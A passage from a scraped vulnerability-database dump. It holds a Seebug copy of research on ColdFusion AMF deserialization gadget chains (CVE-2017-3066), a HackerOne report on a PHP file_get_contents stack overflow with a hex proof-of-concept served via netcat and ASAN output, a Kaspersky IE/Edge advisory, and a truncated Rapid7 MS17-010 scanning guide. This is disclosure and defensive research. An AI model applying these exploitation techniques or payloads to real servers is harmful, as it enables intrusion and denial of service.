public abstract void writeExternal(ObjectOutput paramObjectOutput)\r\n throws IOException;\r\n\r\n public abstract void readExternal(ObjectInput paramObjectInput)\r\n throws IOException, ClassNotFoundException;\r\n}\r\n```\r\n\r\nEvery class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput-implementation to read serialized primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).\r\n\r\nDuring deserialization of an object (type 0xa) in AMF3, the method readScriptObject() of class flex.messaging.io.amf.Amf3Input gets called. In line #759 the method readExternalizable is invoked which calls the readExternal() method on the object to be deserialized.\r\n```\r\n/* */ protected Object readScriptObject()\r\n/* */ throws ClassNotFoundException, IOException\r\n/* */ {\r\n/* 736 */ int ref = readUInt29();\r\n/* */ \r\n/* 738 */ if ((ref & 0x1) == 0) {\r\n/* 739 */ return getObjectReference(ref >> 1);\r\n/* */ }\r\n/* 741 */ TraitsInfo ti = readTraits(ref);\r\n/* 742 */ String className = ti.getClassName();\r\n/* 743 */ boolean externalizable = ti.isExternalizable();\r\n/* */ \r\n/* */\r\n/* */\r\n/* 747 */ Object[] params = { className, null };\r\n/* 748 */ Object object = createObjectInstance(params);\r\n/* */ \r\n/* */\r\n/* 751 */ className = (String)params[0];\r\n/* 752 */ PropertyProxy proxy = (PropertyProxy)params[1];\r\n/* */ \r\n/* */\r\n/* 755 */ int objectId = rememberObject(object);\r\n/* */ \r\n/* 757 */ if (externalizable)\r\n/* */ {\r\n/* 759 */ readExternalizable(className, object); //<- call to readExternal\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nThis should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.\r\n\r\n### PREVIOUS WORK\r\nChris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.\r\n\r\nWouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.\r\n\r\nLooking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.\r\n\r\nThe most recent ones are:\r\n* Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)\r\n* XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)\r\n* XXE (CVE-2016-4264 by @dawid_golunski)\r\n\r\n### CVE-2017-3066\r\nIn 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered independently the vulnerability CVE-2017-3066 in Apache BlazeDS.\r\n\r\nThe core problem of this vulnerability was that Adobe Coldfusion never did any whitelisting of allowed classes. Thus any class in the classpath of Adobe ColdFusion, which either fulfills the Java Beans Convention or implements java.io.Externalizable could be sent to the server and get deserialized. Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface and triggered an outgoing TCP connection during AMF3 deserialization. After the connection was made to the attacker's server, its response was deserialized using Java's native deserialization using ObjectInputStream.readObject().\r\n\r\nBoth found a great \"bridge\" from AMF deserialization to Java's native deserialization which offers well known exploitation primitives using public gadgets. Details about the vulnerability can also be found in Markus' blog post. \r\n\r\nApache introduced validation through the class flex.messaging.validators.ClassDeserializationValidator. It has a default whitelist but can also be configured with a configuration file. For details see the Apache BlazeDS release notes.\r\n\r\n### FINDING EXPLOITATION PRIMITIVES BEFORE CVE-2017-3066\r\nAs already mentioned in the very beginning my teammate Thomas required an exploit which also works without outgoing connection.\r\n\r\nI had a quick look into the excellent research paper \"Java Unmarshaller Security\" of Moritz Bechler where he analysed several \"Unmarshallers\" including BlazeDS. The exploitation payloads he discovered weren't applicable since the libraries were missing in the classpath.\r\n\r\nSo I started with my typical approach, fired up my favorite \"reverse engineering tool\" when it comes to Java, Eclipse. Eclipse together with the powerful decompiler plugin \"JD-Eclipse\" (https://github.com/java-decompiler/jd-eclipse) is all you need for static and dynamic analysis. As a former Dev I was used to work with IDE's which make your life easier and decompiling and grepping through code is often very inefficient and error prone. So I created a new Java project and added all jar-files of Adobe Coldfusion 12 as external libraries.\r\n\r\nThe first idea was to look for further calls to Java's ObjectInputStream.readObject-method. Using Eclipse this is very easy. Just open class ObjectInputStream, right click on the readObject() method and click \"Open Call Hierarchy\". Thanks to JD-Eclipse and its decompiler, Eclipse is able to construct call graphs based on class information without having any source. The call graph looks big in the very beginning. But with some experience you see very quickly which nodes in the graph are interesting.\r\n\r\nAfter some hours I found two promising call graphs.\r\n\r\n### SETTER-BASED EXPLOIT\r\nThe first one starts with method setState(byte[] new_state) of class org.jgroups.blocks.ReplicatedTree.\r\n\r\n![](https://images.seebug.org/1522379796392)\r\n\r\n\r\nLooking at the implementation of this method, we already can imagine what is happening in line #605.\r\n```\r\n/* */ public void setState(byte[] new_state)\r\n/* */ {\r\n/* 597 */ Node new_root = null;\r\n/* */ \r\n/* */\r\n/* 600 */ if (new_state == null) {\r\n/* 601 */ if (log.isInfoEnabled()) log.info(\"new cache is null\");\r\n/* 602 */ return;\r\n/* */ }\r\n/* */ try {\r\n/* 605 */ Object obj = Util.objectFromByteBuffer(new_state);\r\n/* 606 */ new_root = (Node)((Node)obj).clone();\r\n/* 607 */ root = new_root;\r\n/* 608 */ notifyAllNodesCreated(root);\r\n/* */ }\r\n/* */ catch (Throwable ex) {\r\n/* 611 */ if (log.isErrorEnabled()) { log.error(\"could not set cache: \" + ex);\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\nA quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().\r\n\r\nThe only thing to mention here is that the byte[] passed to setState() needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364 of class org.jgroups.util.Util.\r\n```\r\n/* */ public static Object objectFromByteBuffer(byte[] buffer, int offset, int length) throws Exception\r\n/* */ {\r\n/* 358 */ if (buffer == null) return null;\r\n/* 359 */ if (JGROUPS_COMPAT)\r\n/* 360 */ return oldObjectFromByteBuffer(buffer, offset, length);\r\n/* 361 */ Object retval = null;\r\n/* 362 */ InputStream in = null;\r\n/* 363 */ ByteArrayInputStream in_stream = new ByteArrayInputStream(buffer, offset, length);\r\n/* 364 */ byte b = (byte)in_stream.read();\r\n/* */ try {\r\n/* */ int len;\r\n/* 367 */ switch (b) {\r\n/* */ case 0:\r\n/* 369 */ return null;\r\n/* */ case 1:\r\n/* 371 */ in = new DataInputStream(in_stream);\r\n/* 372 */ retval = readGenericStreamable((DataInputStream)in);\r\n/* 373 */ break;\r\n/* */ case 2:\r\n/* 375 */ in = new ObjectInputStream(in_stream);\r\n/* 376 */ retval = ((ObjectInputStream)in).readObject();\r\n/* */ //...\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\n\r\nThe exploit can be found in the following image.\r\n\r\n![](https://images.seebug.org/1522379830922)\r\n\r\nThe exploit works against Adobe ColdFusion 12 only since JGroups is only available in this specific version.\r\n\r\n### EXTERNALIZABLE-BASED EXPLOIT\r\nThe second call graph starts in class org.apache.axis2.util.MetaDataEntry with a call to readExternal which is what we are looking for.\r\n\r\n![](https://images.seebug.org/1522379858812)\r\n\r\n\r\nIn line #297 we have a call to SafeObjectInputStream.install(inObject).\r\n```\r\n/* */ public static SafeObjectInputStream install(ObjectInput in)\r\n/* */ {\r\n/* 62 */ if ((in instanceof SafeObjectInputStream)) {\r\n/* 63 */ return (SafeObjectInputStream)in;\r\n/* */ }\r\n/* 65 */ return new SafeObjectInputStream(in) ;\r\n/* */ }\r\nview rawsnippet_org.apache.axis2.context.externalize.SafeObjectInputStream.java hosted with \u2764 by GitHub\r\nIn this function our AMF3Input instance gets wrapped by a org.apache.axis2.context.externalize.SafeObjectInputStream instance.\r\n/* */ private Object readObjectOverride()\r\n/* */ throws IOException, ClassNotFoundException\r\n/* */ {\r\n/* 318 */ boolean isActive = in.readBoolean();\r\n/* 319 */ if (!isActive) {\r\n/* 320 */ if (isDebug) {\r\n/* 321 */ log.debug(\"Read object=null\");\r\n/* */ }\r\n/* 323 */ return null;\r\n/* */ }\r\n/* 325 */ Object obj = null;\r\n/* 326 */ boolean isObjectForm = in.readBoolean();\r\n/* 327 */ if (isObjectForm)\r\n/* */ {\r\n/* 329 */ if (isDebug) {\r\n/* 330 */ log.debug(\" reading using object form\");\r\n/* */ }\r\n/* 332 */ obj = in.readObject();\r\n/* */ } else {\r\n/* 334 */ if (isDebug) {\r\n/* 335 */ log.debug(\" reading using byte form\");\r\n/* */ }\r\n/* */ \r\n/* 338 */ ByteArrayInputStream bais = getByteStream(in);\r\n/* */ \r\n/* */\r\n/* 341 */ ObjectInputStream tempOIS = createObjectInputStream(bais);\r\n/* 342 */ obj = tempOIS.readObject();\r\n/* 343 */ tempOIS.close();\r\n/* 344 */ bais.close();\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nIn line #341 a new instance of class org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created. This class just extends the standard java.io.ObjectInputStream. In line #342 we finally have our call to readObject().\r\nThe following image shows the request for the exploit. \r\n\r\n![](https://images.seebug.org/1522379893889)\r\n\r\nThe exploit works against Adobe ColdFusion 11 and 12. \r\n\r\n### COLDFUSIONPWN\r\nTo make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.\r\n\r\n### TAKEAWAYS\r\nDeserializing untrusted input is bad, that's for sure. From an exploiters perspective exploiting deserialization vulnerabilities is a challenging task since you need to find the \"right\" objects (gadgets) which trigger functionality you can reuse for exploitation. But it's also more fun :-)\r\n\r\nBy the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization vulnerabilities and how to do proper static and dynamic analysis in Java, you might be interested in our upcoming \"Advanced Java Exploitation\" course.", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97208", "id": "SSV:97208", "title": "Adobe ColdFusion \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2017-3066\uff09", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "hackerone": [{"lastseen": "2019-10-23T18:01:37", "bulletinFamily": "bugbounty", "bounty": 500.0, "description": "In the network interfacing PHP API file_get_contents(), a mechanism is implemented to parse the HTTP/S response from the remote host. A vulnerability is found when the vulnerable PHP build processes certain malformed HTTP/S response packets, resulting an array negative indexing. \n\nVulnerable code at:\n```\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\n\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\n\t\t\t\t--tmp_line_len;\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\n\t\t\t\t\t--tmp_line_len;\n\t\t\t\t}\n```\n\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go to -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\n```\n$ bin/php --version\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\nCopyright (c) 1997-2018 The PHP Group\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\n```\n\nTest script:\n```\n---------------\n$ xxd -g 1 poc\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\n```\n```\n$ nc -vvlp 8080 < poc\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\nGET / HTTP/1.0\nHost: localhost:8080\nConnection: close\n\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\n```\nExpected result:\n----------------\nNO CRASH\n\nActual result:\n```\n--------------\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\n=================================================================\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\nREAD of size 1 at 0xbfc038ef thread T0\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\n This frame has 13 object(s):\n [32, 36) 'transport_string'\n [96, 100) 'errstr'\n [160, 164) 'http_header_line_length'\n [224, 232) 'timeout'\n [288, 296) 'req_buf'\n [352, 360) 'tmpstr'\n [416, 432) 'ssl_proxy_peer_name'\n [480, 496) 'http_header'\n [544, 576) 'buf'\n [608, 736) 'tmp_line'\n [768, 1792) 'location'\n [1824, 2848) 'new_path'\n [2880, 3904) 'loc_path'\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\n (longjmp and C++ exceptions *are* supported)\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\nShadow bytes around the buggy address:\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Heap righ redzone: fb\n Freed Heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n ASan internal: fe\n==26249== ABORTING\nAborted\n```\n\nDetails can be found at https://bugs.php.net/bug.php?id=75981\nThe bug is fixed in the security repo and is pending CVE assignment.\n\n## Impact\n\nA DoS can be triggered when certain conditions are met, or other implications from the subsequent string operations. The affected mechanism is popular as file_get_contents() is a very popular API among PHP based web applications.", "modified": "2019-10-14T04:37:33", "published": "2018-02-27T09:14:23", "id": "H1:320222", "href": "https://hackerone.com/reports/320222", "type": "hackerone", "title": "PHP (IBB): memory corruption while parsing HTTP response", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:48", "bulletinFamily": "info", "description": "### *Detect date*:\n09/12/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, bypass security restrictions and spoof user interface.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions 9 through 11 \nMicrosoft Edge\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8756>) \n[CVE-2017-8747](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8747>) \n[CVE-2017-8734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8734>) \n[CVE-2017-8729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8729>) \n[CVE-2017-8728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8728>) \n[CVE-2017-8757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8757>) \n[CVE-2017-8749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8749>) \n[CVE-2017-8738](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8738>) \n[CVE-2017-11766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11766>) \n[CVE-2017-8750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8750>) \n[CVE-2017-8731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8731>) \n[CVE-2017-8753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8753>) \n[CVE-2017-8723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8723>) \n[CVE-2017-8724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8724>) \n[CVE-2017-8741](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8741>) \n[CVE-2017-8754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8754>) \n[CVE-2017-8740](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8740>) \n[CVE-2017-8752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8752>) \n[CVE-2017-8597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8597>) \n[CVE-2017-8660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8660>) \n[CVE-2017-8736](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8736>) \n[CVE-2017-11764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11764>) \n[CVE-2017-8643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8643>) \n[CVE-2017-8751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8751>) \n[CVE-2017-8649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8649>) \n[CVE-2017-8748](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8748>) \n[CVE-2017-8755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8755>) \n[CVE-2017-8737](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8737>) \n[CVE-2017-8648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8648>) \n[CVE-2017-8739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8739>) \n[CVE-2017-8735](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8735>) \n[CVE-2017-8733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8733>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8756](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8756>)7.6High \n[CVE-2017-8747](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8747>)7.6High \n[CVE-2017-8734](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8734>)7.6High \n[CVE-2017-8729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8729>)7.6High \n[CVE-2017-8728](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8728>)7.6High \n[CVE-2017-8757](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8757>)7.6High \n[CVE-2017-8749](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8749>)7.6High \n[CVE-2017-8738](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8738>)7.6High \n[CVE-2017-11766](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11766>)7.6High \n[CVE-2017-8750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8750>)7.6High \n[CVE-2017-8731](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8731>)7.6High \n[CVE-2017-8753](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8753>)7.6High \n[CVE-2017-8723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8723>)4.3High \n[CVE-2017-8724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8724>)4.3High \n[CVE-2017-8741](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8741>)7.6High \n[CVE-2017-8754](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8754>)4.0High \n[CVE-2017-8740](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8740>)7.6High \n[CVE-2017-8752](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8752>)7.6High \n[CVE-2017-8597](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8597>)4.3High \n[CVE-2017-8660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8660>)9.3High \n[CVE-2017-8736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8736>)4.3High \n[CVE-2017-11764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11764>)7.6High \n[CVE-2017-8643](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8643>)4.3High \n[CVE-2017-8751](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8751>)7.6High \n[CVE-2017-8649](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8649>)7.6High \n[CVE-2017-8748](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8748>)7.6High \n[CVE-2017-8755](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8755>)7.6High \n[CVE-2017-8737](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8737>)7.6High \n[CVE-2017-8648](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8648>)4.3High \n[CVE-2017-8739](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8739>)4.3High \n[CVE-2017-8735](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8735>)4.3High \n[CVE-2017-8733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8733>)4.3High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038792](<http://support.microsoft.com/kb/4038792>) \n[4038799](<http://support.microsoft.com/kb/4038799>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4038777](<http://support.microsoft.com/kb/4038777>) \n[4036586](<http://support.microsoft.com/kb/4036586>)", "modified": "2019-03-07T00:00:00", "published": "2017-09-12T00:00:00", "id": "KLA11098", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11098", "title": "\r KLA11098Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7community": [{"lastseen": "2017-08-03T17:21:32", "bulletinFamily": "blog", "description": "<div class=\"jive-rendered-content\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. It is believed that the ransomworm achieved its initial infection via a compromised software update, and that it then leverages the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue </a>and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\">DoublePulsar </a>exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">WannaCry</a> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities. For the latest updates on this ransomworm, please see Rapid7’s <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\">recommended actions</a>. To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven’t done so already, <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. <h2 dir=\"ltr\">Creating a Scan Template</h2>The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 is as follows:1.  Under the Administration tab, go to Templates > Manage Templates <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a>  2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description. <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\" <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> 4. Add Check “<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\">MS17-010</a>” and click Save: <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a> This should return checks that are related to MS17-010. The related CVEs are:<a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0143</a><a class=\"jive-link-external-small\" 